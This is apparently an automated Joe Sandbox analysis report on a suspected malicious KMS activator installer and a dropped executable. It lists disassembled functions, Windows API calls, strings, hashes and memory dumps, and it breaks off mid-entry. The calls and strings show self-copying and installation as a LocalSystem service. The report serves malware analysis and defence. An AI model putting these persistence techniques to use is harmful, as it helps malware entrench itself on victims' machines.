    • Instruction ID: 7ac8d78af794401246d7202aea648043024fecf56a2fdbfe3772f4bf061bebfa
    • Opcode Fuzzy Hash: 711be58800e805ecb6d7b188a1a3b1d34c63471b69e6b862fa27ab3b5b537876
    • Instruction Fuzzy Hash: AB219171940208AEDF15AFB4D946AEE7BB4EF04348F20807EF602F71E1C6784680DB98
    Function 00404170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
    Download Yara Rule
    APIs
    • lstrlenA.KERNEL32(004329D8,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,004329D8,?), ref: 00404207
    • wsprintfA.USER32 ref: 0040420F
    • SetDlgItemTextA.USER32(?,004329D8,000000DF), ref: 00404222
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ItemTextlstrlenwsprintf
    • String ID: %u.%u%s%s
    • API String ID: 3540041739-3551169577
    • Opcode ID: 9b6ccf10e7da3be1f64962dccce0f98430dc3013797c6c0db80127e7827a7469
    • Instruction ID: 2e0a2fd9739ff2f37b171b446d8de6aff9e5b1524a652bfffe6c0ede5d09b280
    • Opcode Fuzzy Hash: 9b6ccf10e7da3be1f64962dccce0f98430dc3013797c6c0db80127e7827a7469
    • Instruction Fuzzy Hash: 3411BDB27002147BDB10EA698C05E8F7A5EDBD5330F10423BF119F31D0E6398A1242A8
    Function 00402780 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62registryCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0040153E: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00401578
    • RegCloseKey.ADVAPI32(00000000), ref: 004027CC
    • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004027AC
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • DeleteRegValue: "%s\%s" "%s", xrefs: 004027BE
    • DeleteRegKey: "%s\%s", xrefs: 004027E2
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
    • API String ID: 1697273262-1764544995
    • Opcode ID: b4a9548ae85fb6a48f609ff3661550b915ed0291b3bd89f7fba5d7a8495d9b30
    • Instruction ID: 66dcd731f04371848a62b5b490c12eb96f54ccb54610c652a47dfce0b6bddbd9
    • Opcode Fuzzy Hash: b4a9548ae85fb6a48f609ff3661550b915ed0291b3bd89f7fba5d7a8495d9b30
    • Instruction Fuzzy Hash: 77119132900114ABCB10BFA5DD8AAAF7AA4EF40758F10803FF505BB1D1DA794A509B9D
    Function 00402605 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57stringCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00405F2F: FindFirstFileA.KERNELBASE(?,0043D238,0043AA38,0040605F,0043AA38), ref: 00405F3A
      • Part of subcall function 00405F2F: FindClose.KERNELBASE(00000000), ref: 00405F46
    • lstrlenA.KERNEL32 ref: 0040265B
    • lstrlenA.KERNEL32(?), ref: 00402665
    • SHFileOperationA.SHELL32(?,?,?,?), ref: 0040268D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
    • String ID: CopyFiles "%s"->"%s"
    • API String ID: 2577523808-3778932970
    • Opcode ID: d91c2609d9d3a37918362883fdd1f32f0ce6f5ab44a5e9b9e725bd033ea1f936
    • Instruction ID: df1308414e874344385ccb0db70743e34215db7086e03601d978367423407a79
    • Opcode Fuzzy Hash: d91c2609d9d3a37918362883fdd1f32f0ce6f5ab44a5e9b9e725bd033ea1f936
    • Instruction Fuzzy Hash: 83113D71904318AACB10FFA999459DEBBF8EF44358F10443BF505FB2A2D6788941CB69
    Function 00405E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrcatwsprintf
    • String ID: %02x%c$...
    • API String ID: 3065427908-1057055748
    • Opcode ID: 8330ec017dcf6daaa5d87f9e6d12c7f7e60b5fb70ce942f64005b789dc36ba0a
    • Instruction ID: 6998a8d77c804a990b3433b75bf199d1650f41c430b5dadfc9386a88cdae5be5
    • Opcode Fuzzy Hash: 8330ec017dcf6daaa5d87f9e6d12c7f7e60b5fb70ce942f64005b789dc36ba0a
    • Instruction Fuzzy Hash: 5C01B572950619AFD711CF68DD45A9FBBE9EF44701F20813AF484F3280D6749E548BE8
    Function 004026B4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • WritePrivateProfileStringA.KERNEL32(?,?,?,00000000), ref: 0040272F
    Strings
    • C:\Windows\SysNative\drivers\DvLayout.exe, xrefs: 00402715
    • <RM>, xrefs: 004026B4
    • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 0040271A
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: PrivateProfileStringWritelstrcpyn
    • String ID: <RM>$C:\Windows\SysNative\drivers\DvLayout.exe$WriteINIStr: wrote [%s] %s=%s in %s
    • API String ID: 247603264-2423860124
    • Opcode ID: 7f30c35f5c633a43eb66eb5f240fd7aa6aefab5825936b9c379b1d297ddd1144
    • Instruction ID: 17fbd0df00fd6fcb045c31dc677474ef42d25d5906b3dbd4b5cc0818ab61737d
    • Opcode Fuzzy Hash: 7f30c35f5c633a43eb66eb5f240fd7aa6aefab5825936b9c379b1d297ddd1144
    • Instruction Fuzzy Hash: B8014B31D00624AACB107FA68D86ADF3A64AB08758B24413FF5153B2E3D6BC0A419BDD
    Function 00404DE2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
    Download Yara Rule
    APIs
    • OleInitialize.OLE32(00000000), ref: 00404DF2
      • Part of subcall function 00403C55: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403C67
    • OleUninitialize.OLE32(00000404,00000000), ref: 00404E40
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
    • String ID: Section: "%s"$Skipping section: "%s"
    • API String ID: 2266616436-4211696005
    • Opcode ID: 9f8dacae5462a6c76399edffbbead4483db15c11ba895e786ad9a2b1b14c0b8f
    • Instruction ID: a1697c68c77ba4781e91379a15daded32d39c1c12dad084193f7f42822588db5
    • Opcode Fuzzy Hash: 9f8dacae5462a6c76399edffbbead4483db15c11ba895e786ad9a2b1b14c0b8f
    • Instruction Fuzzy Hash: 8AF0D177104200AAE6107B64EC06B1A73A5EBC1711F24403FFE95721E2DF7808818AAD
    Function 004020D5 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • GetDC.USER32(?), ref: 004020DC
    • GetDeviceCaps.GDI32(00000000), ref: 004020E3
    • MulDiv.KERNEL32(00000000,00000000), ref: 004020F3
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • CreateFontIndirectA.GDI32(0040A0C4), ref: 00402146
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CapsCreateDeviceFontIndirectVersionlstrcat
    • String ID:
    • API String ID: 1124445332-0
    • Opcode ID: 2144f8e1522c99ba9602bfd674ab3bc82ecac8f0158a9007b54edcabe13f8dc0
    • Instruction ID: 640259e299a3f16f87b007cf3a8cc9a13f68f15686798f0dd8441b0453c9db7e
    • Opcode Fuzzy Hash: 2144f8e1522c99ba9602bfd674ab3bc82ecac8f0158a9007b54edcabe13f8dc0
    • Instruction Fuzzy Hash: 79F04F725853489EF701AFB0AE1AB893F64A725305F10847AF281B71E3C97E40149B2E
    Function 00404671 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
    Download Yara Rule
    APIs
    • IsWindowVisible.USER32(?), ref: 004046A7
    • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404715
      • Part of subcall function 00403C55: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403C67
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Window$CallMessageProcSendVisible
    • String ID:
    • API String ID: 3748168415-3916222277
    • Opcode ID: 609411c60a85332449a719750bce59a4915ce97d36c76212318bc84f1f531435
    • Instruction ID: 9605e2b7d7455f37462fd22875193d20b491428cb3cfe519dcb6b817c987f101
    • Opcode Fuzzy Hash: 609411c60a85332449a719750bce59a4915ce97d36c76212318bc84f1f531435
    • Instruction Fuzzy Hash: 2B11BFB1101208FBEF119F91DD81E9B3628AF86314F00803BFB047A1A2C7798C919FA9
    Function 00402191 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
    Download Yara Rule
    APIs
    • ShellExecuteA.SHELL32(?,00000000,?,00000000,00475000,?), ref: 004021DE
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402206
    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 004021EF
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ExecuteShelllstrlenwvsprintf
    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
    • API String ID: 2380004146-2180253247
    • Opcode ID: 0166cebb8d322ba320c64392f3385074b70222ed256a77a233417cfb13c162eb
    • Instruction ID: 4de43b39cb7189c535d92a21d1e38ea8c65eaee599c17ba73f054ba9bc91490a
    • Opcode Fuzzy Hash: 0166cebb8d322ba320c64392f3385074b70222ed256a77a233417cfb13c162eb
    • Instruction Fuzzy Hash: 0801F5766001047ADB007BF9DC46EEE3BA8DB4578CB10803BF511FA0E2E57C8951A7AD
    Function 00405EFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12stringCOMMON
    Download Yara Rule
    APIs
    • lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
    • wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00405D7D: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,00405F2E,00000000), ref: 00405D93
    Strings
    • RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"), xrefs: 00405EFF, 00405F04
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseHandlelstrlenwvsprintf
    • String ID: RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\")
    • API String ID: 3509786178-605988816
    • Opcode ID: 7e4a409281f33c932ecf39ae807571fbd8485c9876b92d50a7589ceb09592647
    • Instruction ID: 9387209c9b180116a0db68cc4ae5316e14ed9d72600609c89a58cc0d7888ddef
    • Opcode Fuzzy Hash: 7e4a409281f33c932ecf39ae807571fbd8485c9876b92d50a7589ceb09592647
    • Instruction Fuzzy Hash: 7ED0A774408346AEDB0057D0CD2DF567B64BF883C5F80447DF148460B0DB74604C8B19
    Function 00406096 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
    Download Yara Rule
    APIs
    • lstrlenA.KERNEL32(0040644E,?,00000000,00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060A6
    • lstrcmpiA.KERNEL32(00000000,0040644E), ref: 004060BE
    • CharNextA.USER32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060CF
    • lstrlenA.KERNEL32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060D8
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$CharNextlstrcmpi
    • String ID:
    • API String ID: 190613189-0
    • Opcode ID: e21e6bfb6fc7a963e8afd99923d37c6b6527800589d0fa15ebc8de9f734da840
    • Instruction ID: 19299f1ab5e3fb249da8c31f47c0dd26908f8824a629a5ffd1e92f46b51ecce3
    • Opcode Fuzzy Hash: e21e6bfb6fc7a963e8afd99923d37c6b6527800589d0fa15ebc8de9f734da840
    • Instruction Fuzzy Hash: 45F0F631100558FFC701DFA4CD00D9EBBA8EF05360B1280BAE841F7311DA30DE019BA9

    Executed Functions

    Function 00641AF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 108COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00641B11
    • GetLastError.KERNEL32 ref: 00641B1B
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000003), ref: 00641B3B
    • GetLastError.KERNEL32 ref: 00641B47
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$FileManagerModuleNameOpen
    • String ID: %s is installed.$.\LocalSystem$CreateService failed w/err 0x%08lx$GetModuleFileName failed w/err 0x%08lx$OpenSCManager failed w/err 0x%08lx$RService$ c
    • API String ID: 1348810199-2665779175
    • Opcode ID: 440aa0284982132a4decb8b5f4a440378999109d8d308e57d340257d897b3506
    • Instruction ID: 4fa6c9a0948fc050a51c343de4de4d391a7aa6a519376ce0b364b880480d8e8f
    • Opcode Fuzzy Hash: 440aa0284982132a4decb8b5f4a440378999109d8d308e57d340257d897b3506
    • Instruction Fuzzy Hash: B531E471780308ABD7106F64DD87FBD366BDF46B55F110118FB05AF2C1EAA0998487A5
    Function 00631D50 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 284sleepfileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006BD893: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BD89F
      • Part of subcall function 006BD893: __CxxThrowException@8.LIBVCRUNTIME ref: 006BD8AD
      • Part of subcall function 00633A90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633AD1
      • Part of subcall function 00633B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633BD1
      • Part of subcall function 00633B90: _wcsrchr.LIBVCRUNTIME ref: 00633BE0
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,00000400,?,?,94A94BDB,?,?,?), ref: 00631DBA
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,?,?), ref: 00631F0F
    • StartServiceCtrlDispatcherW.ADVAPI32(?,?,?), ref: 00631F4D
    • CloseHandle.KERNEL32(?,?,?), ref: 00631F65
    • Sleep.KERNEL32(000001F4,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,?,?), ref: 00632056
    • CopyFileW.KERNELBASE(00000000,00000000,00000000,?), ref: 006320C0
    • Sleep.KERNELBASE(000001F4), ref: 006320CB
    • GetLastError.KERNEL32 ref: 006320F7
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063210F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
